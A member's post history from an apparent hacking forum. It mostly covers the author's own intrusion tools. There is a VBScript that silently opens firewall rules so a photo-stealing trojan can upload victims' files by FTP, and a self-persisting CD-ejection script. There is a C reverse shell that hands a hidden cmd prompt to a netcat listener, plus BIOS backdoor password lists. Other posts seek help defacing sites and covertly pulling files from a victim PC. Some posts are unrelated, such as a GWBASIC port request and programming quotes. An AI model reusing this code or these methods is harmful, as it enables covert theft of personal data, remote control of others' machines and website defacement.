Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - Infinityexists

Pages: [1] 2
1
I got the Administrator access in to 15 different websites and complete database but i couldn't find any of the option to upload anything in the admin panel :/
how could i suppose to deface without the upload and having a complete SQL database

2
C - C++ / Re-writing a code in C-language
« on: May 12, 2012, 12:17:08 pm »
Hello,
 
I  need somebdy help who is good in GWBASIC and C-language,
actually I want someone to write this little GWBASIC code into C-Language
 
Code: [Select]

 10 DIM SAT(6000)
20   ON ERROR GOTO 20
30 SCREEN 9
40 RANDOMIZE TIMER
50 PAPPOG=20000
60 APERIG=8000
70 PANGINC=40
80 COL = 2
90 CLS
100 CIRCLE(5,5),3,COL
110 PAINT(5,5),COL,COL
120   LINE (0,0)-(10,10),COL
130   LINE (0,10)-(10,0),COL
140   GET(0,0)-(10,10),SAT
150   ON KEY(1) GOSUB 1040
160   KEY(1) ON
170  CLS
180   A$=""
190   LOCATE 23,20
200   INPUT "ENTER  APPOGEE (DEFAULT=20000 Km)..";APPOG
210   IF APPOG=0 THEN APPOG=PAPPOG
220   IF APPOG < 6400 OR APPOG > 60000! THEN SOUND 530,1:GOTO 170
230  CLS:LOCATE 23,20
240    INPUT "ENTER  PERIGEE (DEFAULT=8000 Km)..";PERIG
250    IF PERIG=0 THEN PERIG=APERIG
260    IF PERIG < 6400 OR PERIG > 12000 THEN SOUND 530,1:GOTO 230
270  CLS:LOCATE 23,20
280    INPUT "ENTER  ANGLE OF INCLINITION (DEFAULT=40 Deg)..";ANGINC
290    IF ANGINC=0 THEN ANGINC=PANGINC
300    IF ANGINC < 0 OR ANGINC > 360 THEN SOUND 530,1:GOTO 270
310    CLS
320    LOCATE 20,55:PRINT "APPOGEE (Km) = ";APPOG
330    LOCATE 21,55:PRINT "PERIGEE (Km) = ";PERIG
340    LOCATE 22,41:PRINT "ANGLE OF INCLINITION (Deg) = ";ANGINC
350    LOCATE 24,30:PRINT "PRESS  < C >  TO ALTER THE PARAMETERS.."
360    LOCATE 20,30:PRINT "PRESS  < F1 >  TO STOP...."
370    LINE(5,5)-(645,5),1
380    LINE -(645,195),1
390    LINE(5,5)-(5,195),1
400    LINE -(645,195),1
410    PAINT(3,3),0,0
420    CENTREX = 300
430    CENTREY = 100
440    APPOGEE = INT(APPOG/100)
450    PERIGEE = INT(PERIG/100)
460    EARTHRAD = INT(6370/100)
470    PI=3.141593:A=INT((APPOGEE+PERIGEE)/2):B=20
480    FOCUS = A - PERIGEE
490    EARTHX1 = FOCUS*COS(PI)
500    EARTHY1 = FOCUS*SIN(PI)
510    EARTHX = EARTHX1*COS((ANGINC-23)*PI/180)+EARTHY1*SIN((ANGINC-23)*PI/180)+CENTREX
520    EARTHY = EARTHY1*COS((ANGINC-23)*PI/180)-EARTHX1*SIN((ANGINC-23)*PI/180)+CENTREY
530    CIRCLE (EARTHX,EARTHY),EARTHRAD,1
540    PAINT (EARTHX,EARTHY),6,1
550    LINE ((EARTHRAD+5)*COS(113*PI/180)+EARTHX,(EARTHRAD+5)*SIN(113*PI/180)*8.76/12+EARTHY)-(EARTHRAD*COS(113*PI/180)+EARTHX,EARTHRAD*SIN(113*PI/180)*8.76/12+EARTHY),14
560    LINE ((EARTHRAD+5)*COS(293*PI/180)+EARTHX,(EARTHRAD+5)*SIN(293*PI/180)*8.76/12+EARTHY)-((EARTHRAD-2)*COS(293*PI/180)+EARTHX,(EARTHRAD-2)*SIN(293*PI/180)*8.76/12+EARTHY),14
570    FOR T=0 TO 360
580    X2=INT((RND*310)+5)
590   Y2=INT((RND*190)+5)
600    IF X2>(EARTHX-EARTHRAD) AND X2<(EARTHX+EARTHRAD) AND Y2>(EARTHY-EARTHRAD) AND Y2<(EARTHY+EARTHRAD) THEN 630
610    PCOL=1
620    PSET(X2,Y2),PCOL
630    X=A*COS(T*PI/180)
640    Y=B*SIN(T*PI/180)
650    X1=X*COS((ANGINC-23)*PI/180)+Y*SIN((ANGINC-23)*PI/180)+300
660    Y1=Y*COS((ANGINC-23)*PI/180)-X*SIN((ANGINC-23)*PI/180)+100
670    IF X1 > 630 THEN X1=630
680    IF X1 < 10 THEN X1=10
690    IF Y1 > 190 THEN Y1=190
700    IF Y1 < 10 THEN Y1=10
710    V= POINT(X1,Y1)
720    IF T>180 AND V>0 THEN 740
730    PSET(X1,Y1),14
740    NEXT
750    C=2000:D=100:E=3000:V=0
760   FOR T=360 TO 0 STEP -1
770 REM Z=T/90
780 REM IF Z=1 OR Z=3 OR Z=4 THEN DU=5 ELSE DU=.2
790     A$=INKEY$
800     IF A$="C" OR A$="c" THEN 170
810     X=A*COS(T*PI/180)
820     Y=B*SIN(T*PI/180)
830     X1=X*COS((ANGINC-23)*PI/180)+Y*SIN((ANGINC-23)*PI/180)+300
840     Y1=Y*COS((ANGINC-23)*PI/180)-X*SIN((ANGINC-23)*PI/180)+100
850     IF X1 > 630 THEN X1=630
860     IF X1 < 10 THEN X1=10
870     IF Y1 > 190 THEN Y1=190
880     IF Y1 < 10 THEN Y1=10
890     V= POINT(X1,Y1)
900     IF T>180 AND V<>14 THEN 910 ELSE 940
910   FOR I=1 TO C:NEXT
920 REM C=C-3
930     GOTO 1000
940   PUT(X1-5,Y1-5),SAT,XOR
950     IF T>30 AND T<310 THEN 955 ELSE 960
955     IF T>130 AND T<230 THEN 980 ELSE 965
960     FOR I= 1 TO E:NEXT: SOUND 5000,5
962 GOTO 990
965     FOR I= 1 TO C:NEXT
970 GOTO 990
980     FOR I= 1 TO D:NEXT
985     D=D+1
990     PUT(X1-5,Y1-5),SAT,XOR
1000   SOUND 6000,DU
1010     NEXT
1020     GOTO 760
1030 END
1040 RETURN 1030

I could have done this myself but since i've never used GWBASIC and have a very basic knowldge of C-Language I couldn't be able to understand the code.
 
I'd very glad if somebody would help me with this.
 
P.S: the thread is posted with the permission of one the Admin.

3
I wonder if there is any possibility to create a localhost in a Victim PC remotely ? without installing the required software like apache etc.


or is there any way that we can share our data(files/folders) over the internet ?


you do realize what my intention is so don't reply with such comments 'install xampp or blah blah'

4
General discussion / I want to start the Website
« on: April 27, 2012, 09:11:49 am »
Hello Everyone,


I am thinking of start a new small website but can't come up with the idea of what kind of website should i start.


I have the idea that worth to be mentioned,


- SMS website which allow visitors to send free SMS across India/Pakistan


but i haven't come with with any other idea than I'd appreciate your suggestions.

5
General discussion / best Programming/technical quotes
« on: April 20, 2012, 03:37:12 pm »
Here is the few programming quotes i loved most :p



Quote
Documentation is like sex: when it is good, it is very, very good; and when it is bad, it is better than nothing.
-- Dick Brandon


Quote
Beware of bugs in the above code; I have only proved it correct, not tried it.
-- Donald Knuth


Quote
ALL programs are poems, it's just that not all programmers are poets.
-- Jonathan Guthrie


Quote
MS-DOS didn't get as bad as it is overnight - it took over ten years of careful development.
-- D Meggins


Quote
I'm a hacker and proud - and no, that does not mean computer criminal, and if you think it does - go do your homework.
-- Eric S Raymond


Quote
Software is like sex: It's better when it's free.
-- FSF T-shirt


please share your favorites :)


6
After three days of work I've found the incredible way of receiving the SMS notification every time somebody from anywhere around the world execute my photo stealer trojan horse,
The SMS contains the Victim PC name and a small text saying "XYZ executed the Virus of yours" :)


the algorithm is successfully implemented into my trojan and working like a charm ;)

if you don't know about my trojan horse have a look at it here,
http://evilzone.org/hacking-and-security/photo-stealer-trojan-horse-(see-the-demo)/

Please share your thoughts if it is a good idea ;) (btw IT IS a very good idea i think) :)

7
Hacking and Security / well structured diagram for post exploitation
« on: April 17, 2012, 07:36:39 pm »
well structured diagram for post exploitation,



8
Hacking and Security / Photo stealer Trojan Horse (see the demo)
« on: April 13, 2012, 10:38:39 am »
Few months ago i started a thread saying that i am working on a trojan horse that steal all the photos from the victim Pc, here i am testing it on my brother's Laptop ;)


Watch the video and let me know if the source-code worth a share ,


Video with explanation (low quality),

http://www.youtube.com/watch?v=2NRcgx8LdJ8


Video in HQ,

http://www.youtube.com/watch?v=4i60bEJAaz4

coded in: VBScripting, Batch Programming, Php/MySQL with few windows registry tweaks to bypass antivirus and other user access controls.

coded by Sufyan Ghori

9
This little code will permanently enable FTP access in any Pc and never prompt for 'Allow access'


Code: [Select]
'Coded by Sufyan Ghori
'for any query contact me at sufyan@xufyan.com / xufyan@gmail.com


Option Explicit
On Error Resume Next
Dim shell1, Command, Command2, Command3, Command4, Ftpcheck, temp, CMDoutput, textFile, fsoAllowFTPAccess, readFile, i, Command5, Command6, Command7, Command8




Set shell1 = CreateObject("WScript.Shell")
Set fsoAllowFTPAccess = CreateObject("Scripting.FileSystemObject")


temp = shell1.ExpandEnvironmentStrings("%TEMP%") 'Get Temp directory


CMDoutput = temp & "\" & fsoAllowFTPAccess.GetTempName 'Generate a Random name file in temp folder


Ftpcheck = "netsh advfirewall firewall show rule name=""File Transfer Program"" dir=in type=dynamic"


Command = "netsh advfirewall firewall add rule name=""File Transfer Program"" dir=in program=%SystemRoot%\system32\ftp.exe protocol=udp action=allow"


Command2 = "netsh advfirewall firewall add rule name=""File Transfer Program"" dir=in program=%SystemRoot%\system32\ftp.exe protocol=tcp action=allow"


Command5= "netsh advfirewall firewall add rule name=""File Transfer Program""  dir=in program=C:\Windows\syswow64\ftp.exe protocol=udp action=allow"


Command6= "netsh advfirewall firewall add rule name=""File Transfer Program""  dir=in program=C:\Windows\syswow64\ftp.exe protocol=tcp action=allow"


Command3= "netsh advfirewall firewall set rule name=""File Transfer Program"" dir=in protocol=tcp new action=allow"


Command4= "netsh advfirewall firewall set rule name=""File Transfer Program"" dir=in protocol=udp new action=allow"


shell1.Run "cmd /c CD\ &" & Ftpcheck & " > " & CMDoutput, 0 , TRUE 'write the result of command in Temp file


wscript.sleep (2)
Set readFile = fsoAllowFTPAccess.OpenTextFile(CMDoutput)


For i = 1 To 1
      readFile.ReadLine
         If readFile.ReadLine = "No rules match the specified criteria." Then
            shell1.Run "cmd /c CD\ &" & Command
            wscript.sleep (2)
            shell1.Run "cmd /c CD\ &" & Command2
            wscript.sleep (2)
            shell1.Run "cmd /c CD\ &" & Command5
            wscript.sleep (2)
            shell1.Run "cmd /c CD\ &" & Command6
         Else
            shell1.Run "cmd /c CD\ &" & Command3
            wscript.sleep (2)
            shell1.Run "cmd /c CD\ &" & Command4
            wscript.sleep (2)
            shell1.Run "cmd /c CD\ &" & Command5
            wscript.sleep (2)
            shell1.Run "cmd /c CD\ &" & Command6
         End If
Next


readFile.close
fsoAllowFTPAccess.DeleteFile(CMDoutput)

Set fsoAllowFTPAccess = nothing
Set shell1 = nothing
Set readFile = nothing

Coded in: VBScript

Why I've coded this script ?

I was working on the kind of trojan virus that steals all the photos from the victim PC and uploads it to my webserver, after finished developing the trojan i decided to test it so i borrowed my brother's laptop and execute the complete trojan but as soon as the trojan executed it prompted me to wether should i allow FTP access or not, this was the point when i decided to bypass this message of allowing FTP access, hence i coded this script :)Now my trojan never prompt user to allow ftp access and enable it by itself :)

Where it can be useful ?

This script could come handy when you're developing some kind of trojan that uploads data from victim pc to your server through FTP


Thankyou-
Sufyan Ghori

10
Hacking and Security / Unstoppable CD-ROM ejection Attack
« on: April 10, 2012, 03:28:21 pm »
This awesome hack continually pops out anyone's CD-ROM if they intentionally/non-intentionally execute the script, this is  the perfect way to prank your friends or to tease your enemy :D


coded by me in VBScript,
simply copy/paste the code into a new notepad file and save it  script.vbs extension and enjoy the Fun


Code: [Select]
'Coded by: Sufyan Ghori
'https://www.facebook.com/XuFyaN


Set obj1 = CreateObject("WMPlayer.OCX.7")
Set obj2 = obj1.cdromCollection
Set shell1 = CreateObject("WScript.Shell")
Set oShell = CreateObject("Shell.Application")
Set startupFolder = oShell.NameSpace(ssfSTARTUP)
set filesys=CreateObject("Scripting.FileSystemObject")
Const ssfSTARTUP = &H7




If Not startupFolder Is Nothing Then
  tempPath = startupFolder.Self.Path
End If


If Not filesys.FileExists(tempPath & "\script.vbs") Then
   shell1.Run "%COMSPEC%"
   WScript.sleep 500
   shell1.SendKeys  "CD\" & vbCRLF & "copy " & shell1.CurrentDirectory & "\script.vbs " & """" & tempPath & """" & " /y"  & vbCRLF
   shell1.SendKeys "exit " & vbCRLF
End If


do
   if obj2.Count >= 1 then
      For i = 0 to obj2.Count - 1
      obj2.Item(i).Eject
      Next
      For i = 0 to obj2.Count - 1
      obj2.Item(i).Eject
      Next
   End If
   wscript.sleep 5000
loop


Disabling the script,
http://xufyan.com/2012/04/04/continually-pop-out-cd-rom-even-if-the-pc-restarts/



- Thankyou

Sufyan Ghori

11
Hello Crackers


Eventually,here is the Complete Source code that allow you to change the Victim's user account's password to whatever you want, it doesn't only change the current Logged in user account password rather it change all the Administrators/Guest Account passwords and set it to one you've chosen,


There are two files , a Registry File and a VBScript File and both of them are attached.


Features:

* Works perfectly in Windows 7

*It works only if the current logged in user is any of the Administrator

*Both the files must be place together

*You can create the SFX to compile them into a single executable file.

*The default password to be set is 'SufyanGhori', if you want your own custom password then open the vbs file and simply replace 'SufyanGhori' with the password you want.


If you've any question regarding the code simply post them here, I'm here to answer them all :)

You're free to share the code but please don't remove the credit i.e my name 'Sufyan Ghori' which is mentioned as a comment in both the files :) .

- Thankyou
Sufyan Ghori

12
Hello,


I just finished coding a Virus that change the user Account password in a Victim PC :D
not just the account user currently logged in but it will change the password to every administrator/guest account in a victim PC and if there is no password set for the Administrator account it will set one ;)


Let me know if it worth a share :)


Have a look at it here ,


http://evilzone.org/scripting-languages/change-user-account-passwords-on-a-victim-pc-source-code/

13
Hacking and Security / Bypass BIOS Password - Ultimate Guide
« on: March 21, 2012, 08:36:33 pm »

How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

14
Hacking and Security / Reverse Connection Shell (code)
« on: March 17, 2012, 06:53:06 pm »

I've found this somewhere but didn't understand how it works , maybe some of you could help understanding this




Reverse Connection Shell ,



This would be used to connect back to you and spawn a CMD shell on the target's system. Yes you can use the CMD on the target system, that is the whole point.




1. Set Netcat to listen on your system with the Port and IP specified in the example (Change both to your liking): nc -lvvp 1977.


2. When someone runs this RevCon it connects back to you through the Port and IP specified and gives you a CMD shell on their system through Netcat.


3. Do what you want on the target system.

Code: [Select]
#include <winsock2.h>
#pragma comment(lib,"ws2_32")


void main()
{
WSADATA a;
SOCKET b;
STARTUPINFO c;
PROCESS_INFORMATION d;
struct sockaddr_in e;
memset(&e,0,sizeof(e));
memset(&c,0,sizeof(c));
WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW
}

15
Hacking and Security / Remote Desktop Trojan
« on: March 15, 2012, 04:51:02 pm »
How Remote Desktop Trojan work , does it enable the port 3389 itself inside the Victim Router configuration , if no then how it works :S
since if i want to code my own , it is only possible if the victim has enabled Router Port of 3389

Pages: [1] 2


Intern0t SoldierX py1337 SecurityOverride programisiai iExploit
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.